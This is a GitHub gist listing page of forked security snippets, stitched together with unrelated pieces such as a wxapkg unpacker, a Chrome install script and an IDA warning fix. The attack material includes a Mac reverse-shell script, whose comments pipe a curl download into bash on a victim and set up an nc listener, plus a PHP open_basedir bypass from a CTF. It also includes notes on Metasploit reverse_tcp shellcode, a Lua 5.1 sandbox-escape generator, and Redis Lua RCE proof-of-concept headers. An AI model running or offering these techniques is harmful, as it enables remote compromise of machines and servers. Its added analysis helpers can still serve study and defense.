@wonderkun
wonderkun / unwxapkg.py
Created January 2, 2018 05:56 — forked from thedreamwork/unwxapkg.py
unpack wxapkg
#!/usr/bin/python
# usage python unwxapkg.py filename
import sys,os
import struct
class WxapkgFile:
    nameLen = 0
    name = ""
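The listing shows only the first lines of unwxapkg.py. As an added, self-contained example (my own code, not the gist's), here is a parser for the wxapkg container following the layout the unwxapkg scripts read: a 14-byte big-endian header (0xBE mark, info1, index length, body length, 0xED mark), a file count, then per-file records of name length, name, absolute offset and size. The builder exists only to construct sample input and the file contents are made up; the extractor additionally refuses entry names that would escape the output directory, since names and offsets inside a downloaded package are attacker-controlled.

```python
"""Parse and safely extract wxapkg (WeChat mini-program) archives.

Layout assumed here (as read by the unwxapkg scripts):
  header : >BIIIB = first mark 0xBE, info1, index length, body length, last mark 0xED
  index  : >I file count, then per file: >I name length, name bytes, >I offset, >I size
  body   : raw file contents; offsets are absolute from the start of the archive
"""
import os
import struct

HEADER = struct.Struct(">BIIIB")
U32 = struct.Struct(">I")
FIRST_MARK, LAST_MARK = 0xBE, 0xED


def build_wxapkg(entries):
    """Pack {name: bytes} into a wxapkg blob (used here only to construct sample input)."""
    names = list(entries)
    index_len = U32.size + sum(U32.size + len(n.encode("utf-8")) + 2 * U32.size for n in names)
    body_start = HEADER.size + index_len
    index = U32.pack(len(names))
    body = b""
    for name in names:
        data = entries[name]
        raw = name.encode("utf-8")
        index += U32.pack(len(raw)) + raw + U32.pack(body_start + len(body)) + U32.pack(len(data))
        body += data
    return HEADER.pack(FIRST_MARK, 0, index_len, len(body), LAST_MARK) + index + body


def parse_wxapkg(blob):
    """Return {name: bytes} for a wxapkg blob; raise ValueError on malformed input."""
    try:
        first, _info1, index_len, body_len, last = HEADER.unpack_from(blob, 0)
        if first != FIRST_MARK or last != LAST_MARK:
            raise ValueError("bad wxapkg marks: %#x %#x" % (first, last))
        if HEADER.size + index_len + body_len > len(blob):
            raise ValueError("header lengths exceed archive size")
        pos = HEADER.size
        (count,) = U32.unpack_from(blob, pos)
        pos += U32.size
        files = {}
        for _ in range(count):
            (name_len,) = U32.unpack_from(blob, pos)
            pos += U32.size
            name = blob[pos:pos + name_len].decode("utf-8")
            pos += name_len
            offset, size = struct.unpack_from(">II", blob, pos)
            pos += 2 * U32.size
            # Offsets come from the file itself: bound them before slicing.
            if offset < HEADER.size + index_len or offset + size > len(blob):
                raise ValueError("entry %r points outside the body" % name)
            files[name] = blob[offset:offset + size]
        return files
    except struct.error as exc:
        raise ValueError("truncated wxapkg: %s" % exc)


def safe_member_path(out_dir, name):
    """Map an entry name such as '/app-service.js' under out_dir, refusing path traversal."""
    root = os.path.realpath(out_dir)
    # Entry names start with '/'; strip it so they join under out_dir instead of replacing it.
    target = os.path.realpath(os.path.join(root, name.lstrip("/")))
    if os.path.commonpath([root, target]) != root:
        raise ValueError("entry %r escapes %s" % (name, out_dir))
    return target


def extract_wxapkg(blob, out_dir):
    """Write every entry under out_dir; returns the list of paths written."""
    written = []
    for name, data in parse_wxapkg(blob).items():
        path = safe_member_path(out_dir, name)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)
        written.append(path)
    return written


# Constructed sample archive; the contents are made up, not from a real mini-program.
SAMPLE = build_wxapkg({
    "/app-config.json": b'{"pages":["pages/index/index"]}',
    "/app-service.js": b"console.log('hello');",
})

if __name__ == "__main__":
    for name, data in parse_wxapkg(SAMPLE).items():
        print("%-20s %5d bytes" % (name, len(data)))
```

Run it on a real package with `parse_wxapkg(open(path, "rb").read())`; the traversal check matters because nothing stops a malicious package from naming an entry `/../../.bashrc`.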
wonderkun / reverse-shell.sh
Created June 14, 2018 04:00 — forked from mattes/reverse-shell.sh
Reverse Shell Mac
#!/usr/bin/env bash
# run `nc -nvl 80` on attacker machine first
# run `curl -Ls https://git.io/vXd2N | bash -s <attacker-ip> 80` on victim machine
# great commands to run:
# * curl http://discovermagazine.com/~/media/import/images/b/e/b/chimpmedia.jpg -o /tmp/monkey.jpg
# open /tmp/monkey.jpg
# * say hello
# * open http://lmgtfy.com/?q=how+to+lock+mac
# * ls
wonderkun / chrome_install_headless.sh
Created August 13, 2019 06:43 — forked from Leotomas/chrome_install_headless.sh
Install Chrome headless on Ubuntu
export CHROME_BIN=/usr/bin/google-chrome
export DISPLAY=:99.0
sh -e /etc/init.d/xvfb start
sudo apt-get update
sudo apt-get install -y libappindicator1 fonts-liberation
wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb
sudo dpkg -i google-chrome*.deb
wonderkun / MoP.php
Created September 16, 2019 05:36 — forked from wupco/MoP.php
realworldctf
<?php
// open_basedir bypass: open_basedir may be tightened at runtime, and a relative
// value is resolved against the current working directory on every check.
function bypass_open_basedir(){
    if(!is_dir('/tmp/ab')){
        mkdir('/tmp/ab');
    }
    chdir('/tmp/ab');
    // '..' resolves to /tmp, which the sandbox must already allow (hence the /tmp/ab detour),
    // so PHP accepts it as a narrower open_basedir.
    ini_set('open_basedir','..');
    // Each chdir('..') is still inside '..' relative to the *current* cwd, so the
    // check passes every time while the cwd climbs to /.
    chdir('..');
    chdir('..');
    chdir('..');
    // With cwd at /, '..' is /, and the restriction can be widened to the whole filesystem.
    ini_set('open_basedir','/');
}
; reverse_tcp shellcode: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_tcp.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/stager/stager_reverse_tcp_nx.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_tcp.asm
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_recv.asm
; asm_block_api for windows x86: https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/payload/windows/block_api.rb
; https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm
; hash algorithm & the precomputed hash values of the various functions: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/hash.py
; PE structure: https://docs.microsoft.com/en-us/windows/desktop/debug/pe-format
; "0day安全:软件漏洞分析技术" (0day Security: Software Vulnerability Analysis Techniques), page 92
; https://blog.cob
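The comment block above collects the Metasploit sources for a reverse_tcp stager; the part a reader most often has to reproduce is the block_api hashing that lets position-independent code resolve imports without any strings. The Python below is an added reimplementation (my own, derived from the hash.py and block_api.asm files linked above, not code from this gist) of that hash, plus a small scanner that labels `push imm32` constants in a shellcode blob. The list of imports is the set the linked reverse_tcp stager blocks resolve, and the stub the scanner runs on is a constructed fragment, not the real stager.

```python
"""Reimplementation of Metasploit's block_api import hashing (hash.py / block_api.asm),
plus a scanner that labels the hashes pushed by an x86 stager."""

MASK32 = 0xFFFFFFFF


def ror32(value, bits):
    """Rotate a 32-bit value right by bits (x86 `ror reg, bits`)."""
    value &= MASK32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def ror13_hash(data, bits=13):
    """Fold bytes with ror-13-then-add, as block_api.asm does over module and export names."""
    h = 0
    for b in data:
        h = (ror32(h, bits) + b) & MASK32
    return h


def module_hash(module):
    """block_api walks InMemoryOrderModuleList and hashes BaseDllName: the UTF-16LE
    name, upper-cased, including the terminating wide NUL."""
    return ror13_hash((module.upper() + "\x00").encode("utf-16-le"))


def function_hash(function):
    """Export names in the PE export name table are ANSI, NUL-terminated and case-sensitive."""
    return ror13_hash((function + "\x00").encode("ascii"))


def api_hash(module, function):
    """The 32-bit constant a stager pushes before `call ebp`: module hash + function hash mod 2^32."""
    return (module_hash(module) + function_hash(function)) & MASK32


# Imports resolved by the reverse_tcp stager blocks linked above.
REVERSE_TCP_IMPORTS = [
    ("kernel32.dll", "LoadLibraryA"),
    ("ws2_32.dll", "WSAStartup"),
    ("ws2_32.dll", "WSASocketA"),
    ("ws2_32.dll", "connect"),
    ("ws2_32.dll", "recv"),
    ("kernel32.dll", "VirtualAlloc"),
    ("kernel32.dll", "ExitProcess"),
    ("kernel32.dll", "ExitThread"),
]


def hash_table(imports=REVERSE_TCP_IMPORTS):
    """{hash: 'module!function'} in the spelling hash.py prints."""
    return {api_hash(m, f): "%s!%s" % (m.lower(), f) for m, f in imports}


def find_api_hashes(shellcode, imports=REVERSE_TCP_IMPORTS):
    """Scan for `push imm32` (opcode 0x68) whose immediate is a known hash.
    Returns [(offset, hash, 'module!function')]. A byte-level opcode scan can
    misfire on data bytes, so treat hits as leads to confirm in a disassembler."""
    table = hash_table(imports)
    hits = []
    for i in range(len(shellcode) - 4):
        if shellcode[i] == 0x68:
            imm = int.from_bytes(shellcode[i + 1:i + 5], "little")
            if imm in table:
                hits.append((i, imm, table[imm]))
    return hits


# Constructed fragment (not the real stager): `push <hash> ; call ebp`, twice.
SAMPLE_STUB = bytes.fromhex("68 4C 77 26 07 FF D5") + bytes.fromhex("68 29 80 6B 00 FF D5")

if __name__ == "__main__":
    for h, name in sorted(hash_table().items(), key=lambda kv: kv[1]):
        print("[+] 0x%08X = %s" % (h, name))
    for off, h, name in find_api_hashes(SAMPLE_STUB):
        print("offset %2d: push 0x%08X ; %s" % (off, h, name))
```

Because the module name is hashed after upper-casing but the export name is not, `api_hash("KERNEL32.DLL", "LoadLibraryA")` equals `api_hash("kernel32.dll", "LoadLibraryA")` while `"loadlibrarya"` does not; that asymmetry mirrors the `cmp al, 'a'` / `sub al, 0x20` step in block_api.asm.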

Exploiting Lua 5.1 on 32-bit Windows

The following Lua program generates a Lua bytecode program called ignore-unsigned-sga.fnt, which in turn loads a DLL from within an extremely locked down Lua 5.1 sandbox in a program called RelicCOH2.exe. The remainder of this document attempts to explain how this program works by a whirlwind tour of relevant bits of the Lua 5.1 virtual machine.

if string.dump(function()end):sub(1, 12) ~= "\27Lua\81\0\1\4\4\4\8\0" then
  error("This generator requires a 32-bit version of Lua 5.1")
end

local function outer()
  local magic -- In bytecode, the stack slot corresponding to this local is changed
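The guard at the top of the generator compares the first 12 bytes of `string.dump` output against a literal; in Lua's decimal escapes that literal is the Lua 5.1 header: signature `\27Lua`, version `\81` (0x51), format 0, endianness 1 (little-endian), sizeof(int) 4, sizeof(size_t) 4, sizeof(Instruction) 4, sizeof(lua_Number) 8, and integral flag 0. The Python below is an added example (my own, not corsix's code) that decodes that header field by field, reports whether the target is a 32-bit little-endian build, and reads the main function prototype that follows far enough to name its instructions; the field order and opcode numbering come from Lua 5.1's lundump.c and lopcodes.h. The chunk it parses is built by hand inside the block as sample input (a stripped chunk whose only instruction is `RETURN 0 1`), so it runs without a Lua interpreter.

```python
"""Decode a Lua 5.1 bytecode chunk: the 12-byte header and the main function prototype."""
import struct

LUA51_SIGNATURE = b"\x1bLua"
HEADER_SIZE = 12
# Opcode numbering from Lua 5.1 lopcodes.h; the opcode is the low 6 bits of each instruction.
OPCODES = (
    "MOVE LOADK LOADBOOL LOADNIL GETUPVAL GETGLOBAL GETTABLE SETGLOBAL SETUPVAL "
    "SETTABLE NEWTABLE SELF ADD SUB MUL DIV MOD POW UNM NOT LEN CONCAT JMP EQ LT LE "
    "TEST TESTSET CALL TAILCALL RETURN FORLOOP FORPREP TFORLOOP SETLIST CLOSE "
    "CLOSURE VARARG"
).split()
OP_RETURN = OPCODES.index("RETURN")  # 30


def parse_header(chunk):
    """Decode the header string.dump() emits (lundump.c luaU_header); ValueError if not Lua 5.1."""
    if len(chunk) < HEADER_SIZE or chunk[:4] != LUA51_SIGNATURE:
        raise ValueError("not a Lua bytecode chunk")
    version, fmt, endian, sz_int, sz_size_t, sz_instr, sz_number, integral = chunk[4:HEADER_SIZE]
    if version != 0x51 or fmt != 0:
        raise ValueError("version byte %#x / format %d is not official Lua 5.1" % (version, fmt))
    return {
        "little_endian": endian == 1,
        "sizeof_int": sz_int,
        "sizeof_size_t": sz_size_t,  # pointer-sized: 4 on 32-bit builds, 8 on 64-bit builds
        "sizeof_instruction": sz_instr,
        "sizeof_lua_number": sz_number,
        "integral_numbers": integral == 1,
    }


def is_32bit_little_endian(chunk):
    """What the generator's 12-byte comparison enforces about the target's word size."""
    h = parse_header(chunk)
    return h["sizeof_size_t"] == 4 and h["little_endian"]


def parse_main_function(chunk):
    """Decode the top-level prototype after the header (lundump.c LoadFunction) up to and
    including its instruction list; constants and debug info are left unparsed."""
    h = parse_header(chunk)
    if h["sizeof_instruction"] != 4:
        raise ValueError("unsupported instruction size %d" % h["sizeof_instruction"])
    end = "<" if h["little_endian"] else ">"
    int_ch = {4: "i", 8: "q"}[h["sizeof_int"]]
    size_ch = {4: "I", 8: "Q"}[h["sizeof_size_t"]]
    try:
        pos = HEADER_SIZE
        (src_len,) = struct.unpack_from(end + size_ch, chunk, pos)
        pos += struct.calcsize(size_ch)
        # LoadString: length 0 means no source name; otherwise the bytes include the trailing NUL.
        source = chunk[pos:pos + src_len].rstrip(b"\x00").decode("utf-8", "replace")
        pos += src_len
        linedefined, lastlinedefined = struct.unpack_from(end + int_ch * 2, chunk, pos)
        pos += 2 * struct.calcsize(int_ch)
        nups, numparams, is_vararg, maxstacksize = chunk[pos:pos + 4]
        pos += 4
        (sizecode,) = struct.unpack_from(end + int_ch, chunk, pos)
        pos += struct.calcsize(int_ch)
        if sizecode < 0 or sizecode > (len(chunk) - pos) // 4:
            raise ValueError("sizecode %d runs past the end of the chunk" % sizecode)
        code = struct.unpack_from(end + "%dI" % sizecode, chunk, pos)
    except struct.error as exc:
        raise ValueError("truncated chunk: %s" % exc)
    opcodes = [OPCODES[i & 0x3F] if (i & 0x3F) < len(OPCODES) else "INVALID(%d)" % (i & 0x3F)
               for i in code]
    return {"source": source, "linedefined": linedefined, "lastlinedefined": lastlinedefined,
            "nups": nups, "numparams": numparams, "is_vararg": is_vararg,
            "maxstacksize": maxstacksize, "code": list(code), "opcodes": opcodes}


def build_return_chunk(bits, little_endian=True):
    """Constructed sample, laid out by hand: a stripped chunk whose only instruction is
    RETURN 0 1 (the body of `function() end`) for a 32- or 64-bit Lua 5.1 build."""
    sz = {32: 4, 64: 8}[bits]
    end = "<" if little_endian else ">"
    header = LUA51_SIGNATURE + bytes([0x51, 0, 1 if little_endian else 0, 4, sz, 4, 8, 0])
    proto = struct.pack(end + ("I" if sz == 4 else "Q"), 0)  # source name: none (stripped)
    proto += struct.pack(end + "ii", 0, 0)                    # linedefined, lastlinedefined
    proto += bytes([0, 0, 0, 2])                              # nups, numparams, is_vararg, maxstacksize
    ret = OP_RETURN | (0 << 6) | (1 << 23)                    # iABC: op bits 0-5, A bits 6-13, C 14-22, B 23-31
    proto += struct.pack(end + "iI", 1, ret)                  # sizecode, code[0]
    proto += struct.pack(end + "iiiii", 0, 0, 0, 0, 0)        # sizek, sizep, sizelineinfo, sizelocvars, sizeupvalues
    return header + proto


if __name__ == "__main__":
    for bits in (32, 64):
        c = build_return_chunk(bits)
        print(bits, "bit header:", c[:12].hex(), "opcodes:", parse_main_function(c)["opcodes"])
```

Point `parse_main_function` at the real `string.dump` output (or at the generated .fnt file) to check the `maxstacksize` and instruction encodings the generator relies on before sending it to the target.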
wonderkun / redis-lua-linux-x86-poc.py
Created October 13, 2019 09:13 — forked from orangetw/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
wonderkun / redis-lua-linux-x86-poc.py
Created October 13, 2019 09:13 — forked from c3c/redis-lua-linux-x86-poc.py
Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Redis Lua 5.1 sandbox escape 32-bit Linux exploit
## Original exploit by corsix and sghctoma
## Author: @c3c
## It's possible to abuse the Lua 5.1 sandbox to obtain RCE by loading modified bytecode
## This concept is fully explained on corsix' gist at https://gist.github.com/corsix/6575486
## This version uses pieces of the 32-bit Windows exploit made by corsix and the 64-bit Linux exploit made by sghctoma; as expected, a few offsets were different
## sghctoma's exploit uses the arbitrary memory read to leak pointers to libc and find the address of "system" http://paper.seebug.org/papers/Security%20Conf/Defcon/2015/DEFCON-23-Tamas-Szakaly-Shall-We-Play-A-Game.pdf
## This code is much the same, except the process is done using pwntools' DynELF
## Furthermore, attempting to leak addresses in libc appears to cause segfaults on my 32-bit Linux, in which case, you will need to obtain the remote libc version
`C:\Program Files\IDA Pro 7.4\python\3\idc.py:5121: SyntaxWarning: "is not" with a literal. Did you mean "!="?`
`if newtype is not '':`
--- FIX ---
To silence the warning without changing behaviour, change line 5121 to the comparison the warning suggests:
`if newtype != '':`
`if newtype is not None:` also silences it, but treats an empty string differently: `'' is not None` is true, so an empty `newtype` would now pass the test.
wonderkun / RootHelper.x.c
Created July 22, 2021 02:44 — forked from NullArray/RootHelper.x.c
RootHelper Obfuscated, Encrypted, Converted to C source
//#____ ____ __
//#\ \ / /____ _____/ |_ ___________
//# \ Y // __ \_/ ___\ __\/ _ \_ __ \
//# \ /\ ___/\ \___| | ( <_> ) | \/
//# \___/ \___ >\___ >__| \____/|__|
//# \/ \/
//#--Licensed under GNU GPL 3
//#----Authored by Vector/NullArray
//###############################################